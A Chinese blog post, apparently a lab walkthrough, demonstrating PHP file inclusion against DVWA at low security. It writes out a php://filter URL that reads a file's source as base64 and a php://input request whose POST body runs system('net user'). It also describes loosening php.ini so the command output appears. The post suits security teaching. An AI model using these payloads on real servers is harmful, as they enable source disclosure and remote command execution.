文件包含漏洞之——php包含读写文件

php包含读写文件

php包含读文件

实验环境

	实验环境DVWA,安全性low
		条件是要知道这个文件的名称和路径

操作

浏览器打开代理,开启burp 在浏览器中构造URL
http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=x.php
这个地址的作用是访问URL,修改包含函数的参数,由此通过php协议(php://filter/read)得到经过base64加密后的字符串
再解密就可以得到PHP数据内容了

php包含写文件

构造URL
http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://input

并且burp提交post数据为:<?php system('net user');?> 使用php语言,system函数,执行net user
函数也可以采用很多其他可以执行命令的函数都可以在这里使用

注意

只有在allow
_url_include为on的时候才可以使用,如果想查看回显结果那必须在C:\php\php-5.2.14-Win32下找到php-apache2handler.ini打开,查找display_funtions=proc-open,oppen,exec,system…….删掉system重启apache。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值